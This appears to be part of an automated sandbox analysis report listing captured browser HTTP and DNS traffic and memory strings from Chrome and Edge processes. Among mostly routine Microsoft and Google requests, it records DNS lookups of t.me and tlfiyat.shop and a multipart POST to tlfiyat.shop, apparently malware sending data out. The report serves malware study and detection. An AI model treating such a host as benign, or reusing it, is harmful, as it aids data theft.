Source: global traffic HTTP traffic detected: GET /edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531 HTTP/1.1Host: ntp.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7sec-edge-ntp: {"back_block":0,"bg_cur":{},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowPrivateTarget","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"onscroll","layout":1,"quick_links_opt":1,"sel_feed_piv":"","show_greet":true,"vt_opened":false}Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/SSR-extension.bb64361f77a4185b4ba3.js HTTP/1.1Host: ntp.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-viewport-height: 876sec-ch-ua-arch: "x86"sec-ch-viewport-width: 1232sec-ch-ua-platform-version: "10.0.0"downlink: 1.3sec-ch-ua-full-version-list: "Microsoft Edge";v="117.0.2045.47", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-platform: "Windows"device-memory: 8rtt: 100sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-full-version: "117.0.2045.47"sec-ch-dpr: 1ect: 4gAccept: */*sec-edge-ntp: {"back_block":0,"bg_cur":{},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowPrivateTarget","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"onscroll","layout":1,"quick_links_opt":1,"sel_feed_piv":"","show_greet":true,"vt_opened":false}Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; sptmarket=en-GB||us|en-us|en-us|en||cf=8|RefA=4FCB265BB40E4BFDB1995BFB422B8DA6.RefC=2025-01-23T07:20:35Z; USRLOC=; MUID=051600D928FF6F38109315A4299D6E6A; MUIDB=051600D928FF6F38109315A4299D6E6A; _EDGE_S=F=1&SID=27D53A2D9228664816682F50930F673C; _EDGE_V=1
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/web-worker.c7d27109b98aa5c6a189.js HTTP/1.1Host: ntp.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-viewport-height: 876sec-ch-ua-arch: "x86"sec-ch-viewport-width: 1232sec-ch-ua-platform-version: "10.0.0"downlink: 1.3sec-ch-ua-bitness: "64"sec-ch-ua-full-version-list: "Microsoft Edge";v="117.0.2045.47", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-platform: "Windows"device-memory: 8rtt: 100sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-full-version: "117.0.2045.47"sec-ch-dpr: 1ect: 4gAccept: */*sec-edge-ntp: {"back_block":0,"bg_cur":{},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowPrivateTarget","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"onscroll","layout":1,"quick_links_opt":1,"sel_feed_piv":"","show_greet":true,"vt_opened":false}Sec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: workerReferer: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; sptmarket=en-GB||us|en-us|en-us|en||cf=8|RefA=4FCB265BB40E4BFDB1995BFB422B8DA6.RefC=2025-01-23T07:20:35Z; USRLOC=; MUID=051600D928FF6F38109315A4299D6E6A; MUIDB=051600D928FF6F38109315A4299D6E6A; _EDGE_S=F=1&SID=27D53A2D9228664816682F50930F673C; _EDGE_V=1
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/vendors.ed394b73f8f3e2ec5379.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/microsoft.7fc3109769390e0f7912.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/common.fd6d811d83dd3b0c7b4f.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/experience.3e42f97db270237ebd3c.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /crx/blobs/AcmIXbpGoRruM6Rg2pdHIUfNGnvAwJcqpFoWJV4Xd6PeYFnv5YpJ0-GVzjWL6XpCDzrg9cVo2bTwfPVau85UdyeFfZQe-rOdS7oyguq-391NmfeQd9WZZkjpgIbL1I5KKEcAxlKa5Z8JDrufy52udyO9TokqhOw4Sbnj/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: msedge.exe, 00000009.00000003.1754965752.00007BAC029A8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1754928245.00007BAC02978000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1754699229.00007BAC0290C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 'nonce-oCif3Ui5bugBXCyGPAKDJGUioeMHoZw5puyeKYSgUVs=' 'self' 'report-sample' assets.msn.cn assets2.msn.cn assets.msn.com assets2.msn.com www.msn.com www.msn.cn c.s-microsoft.com/mscc/ geolocation.onetrust.com/cookieconsentpub/v1/geo/location https://www.clarity.ms platform.bing.com/geo/AutoSuggest/v1 www.bing.com/as/ www.bing.com/s/as/ www.youtube.com js.monitor.azure.com business.bing.com/msb/ equals www.youtube.com (Youtube)
Source: chrome.exe, 00000005.00000003.1615303670.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1615564183.0000123803158000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1615714479.0000123802514000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
Source: chrome.exe, 00000005.00000003.1615303670.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1615564183.0000123803158000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1615714479.0000123802514000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
Source: msedge.exe, 00000009.00000003.1754965752.00007BAC029A8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1754928245.00007BAC02978000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1754699229.00007BAC0290C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/auth/cookie/silentpassport https://api.msn.cn/auth/cookie/silentpassport https://www.msn.com https://www.msn.cn https://www.microsoftstart.com login.live.com login.microsoftonline.com www.bing.com/covid www.bing.com/rewardsapp/flyout www.bing.com/shop www.bing.com/shop/halloween www.bing.com/videos/search www.facebook.com www.odwebp.svc.ms www.youtube.com msn.pluto.tv www.bing.com/wpt/prefetchcib https://res.cdn.office.net/ business.bing.com sip: mailto: edge-auth.microsoft.com equals www.facebook.com (Facebook)
Source: msedge.exe, 00000009.00000003.1754965752.00007BAC029A8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1754928245.00007BAC02978000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1754699229.00007BAC0290C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/auth/cookie/silentpassport https://api.msn.cn/auth/cookie/silentpassport https://www.msn.com https://www.msn.cn https://www.microsoftstart.com login.live.com login.microsoftonline.com www.bing.com/covid www.bing.com/rewardsapp/flyout www.bing.com/shop www.bing.com/shop/halloween www.bing.com/videos/search www.facebook.com www.odwebp.svc.ms www.youtube.com msn.pluto.tv www.bing.com/wpt/prefetchcib https://res.cdn.office.net/ business.bing.com sip: mailto: edge-auth.microsoft.com equals www.youtube.com (Youtube)
Source: msedge.exe, 00000009.00000003.1754965752.00007BAC029A8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1754928245.00007BAC02978000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1754699229.00007BAC0290C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/auth/cookie/silentpassport https://api.msn.cn/auth/cookie/silentpassport https://www.msn.com https://www.msn.cn https://www.microsoftstart.com login.live.com login.microsoftonline.com www.bing.com/covid www.bing.com/rewardsapp/flyout www.bing.com/shop www.bing.com/shop/halloween www.bing.com/videos/search www.facebook.com www.odwebp.svc.ms www.youtube.com msn.pluto.tv www.bing.com/wpt/prefetchcib https://res.cdn.office.net/ business.bing.com sip: mailto: edge-auth.microsoft.comh`https://* blob: chrome-search://ntpicon/ chrome-search://local-ntp/ chrome-search://theme/ data:8 equals www.facebook.com (Facebook)
Source: msedge.exe, 00000009.00000003.1754965752.00007BAC029A8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1754928245.00007BAC02978000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1754699229.00007BAC0290C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/auth/cookie/silentpassport https://api.msn.cn/auth/cookie/silentpassport https://www.msn.com https://www.msn.cn https://www.microsoftstart.com login.live.com login.microsoftonline.com www.bing.com/covid www.bing.com/rewardsapp/flyout www.bing.com/shop www.bing.com/shop/halloween www.bing.com/videos/search www.facebook.com www.odwebp.svc.ms www.youtube.com msn.pluto.tv www.bing.com/wpt/prefetchcib https://res.cdn.office.net/ business.bing.com sip: mailto: edge-auth.microsoft.comh`https://* blob: chrome-search://ntpicon/ chrome-search://local-ntp/ chrome-search://theme/ data:8 equals www.youtube.com (Youtube)
Source: msedge.exe, 00000009.00000003.1751788782.00007BAC00B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: msedge.exe, 00000009.00000003.1754965752.00007BAC029A8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1754928245.00007BAC02978000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1754699229.00007BAC0290C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: script-src 'nonce-oCif3Ui5bugBXCyGPAKDJGUioeMHoZw5puyeKYSgUVs=' 'self' 'report-sample' assets.msn.cn assets2.msn.cn assets.msn.com assets2.msn.com www.msn.com www.msn.cn c.s-microsoft.com/mscc/ geolocation.onetrust.com/cookieconsentpub/v1/geo/location https://www.clarity.ms platform.bing.com/geo/AutoSuggest/v1 www.bing.com/as/ www.bing.com/s/as/ www.youtube.com js.monitor.azure.com business.bing.com/msb/;worker-src * blob: equals www.youtube.com (Youtube)
Source: msedge.exe, 00000009.00000003.1754965752.00007BAC029A8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1754928245.00007BAC02978000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1754699229.00007BAC0290C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)
Source: msedge.exe, 00000009.00000003.1754965752.00007BAC029A8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1754928245.00007BAC02978000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1754699229.00007BAC0290C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.youtube.com equals www.youtube.com (Youtube)
Source: global traffic DNS traffic detected: DNS query: t.me
Source: global traffic DNS traffic detected: DNS query: tlfiyat.shop
Source: global traffic DNS traffic detected: DNS query: www.google.com
Source: global traffic DNS traffic detected: DNS query: apis.google.com
Source: global traffic DNS traffic detected: DNS query: play.google.com
Source: global traffic DNS traffic detected: DNS query: ntp.msn.com
Source: global traffic DNS traffic detected: DNS query: bzib.nelreports.net
Source: global traffic DNS traffic detected: DNS query: assets.msn.com
Source: global traffic DNS traffic detected: DNS query: sb.scorecardresearch.com
Source: global traffic DNS traffic detected: DNS query: c.msn.com
Source: global traffic DNS traffic detected: DNS query: api.msn.com
Source: global traffic DNS traffic detected: DNS query: clients2.googleusercontent.com
Source: global traffic DNS traffic detected: DNS query: chrome.cloudflare-dns.com
Source: unknown HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----h4wb1dbiekng47q9hlxlUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0Host: tlfiyat.shopContent-Length: 256Connection: Keep-AliveCache-Control: no-cache
Source: msedge.exe, 00000009.00000003.1785247106.00007BAC03294000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://129fy.ie.chalai.net
Source: msedge.exe, 00000009.00000003.1785247106.00007BAC03294000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://129fy.ie.chalai.net=
Source: msedge.exe, 00000009.00000003.1782618540.00007BAC0054C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0
Source: msedge.exe, 00000009.00000003.1782618540.00007BAC0054C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0?
Source: msedge.exe, 00000009.00000003.1782618540.00007BAC0054C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://acraiz.icpbrasil.gov.br/LCRacraizv1.crl0
Source: msedge.exe, 00000009.00000003.1782618540.00007BAC0054C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://acraiz.icpbrasil.gov.br/LCRacraizv10.crl0
Source: msedge.exe, 00000009.00000003.1782618540.00007BAC0054C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://acraiz.icpbrasil.gov.br/LCRacraizv2.crl0
Source: chrome.exe, 00000005.00000003.1612543251.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1611527214.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1612578328.0000123802970000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743794407.00007BAC00374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1740334856.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/1423136
Source: chrome.exe, 00000005.00000003.1612543251.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1611527214.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1612578328.0000123802970000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743794407.00007BAC00374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1740334856.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/2162
Source: chrome.exe, 00000005.00000003.1612543251.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1611527214.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1612578328.0000123802970000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743794407.00007BAC00374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1740334856.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/2517
Source: chrome.exe, 00000005.00000003.1612543251.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1611527214.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1612578328.0000123802970000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743794407.00007BAC00374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1740334856.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/2970
Source: chrome.exe, 00000005.00000003.1612543251.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1611527214.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1612578328.0000123802970000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743794407.00007BAC00374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1740334856.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3078
Source: chrome.exe, 00000005.00000003.1612543251.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1611527214.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1612578328.0000123802970000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743794407.00007BAC00374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1740334856.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3205
Source: chrome.exe, 00000005.00000003.1612543251.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1611527214.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1612578328.0000123802970000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743794407.00007BAC00374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1740334856.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3206
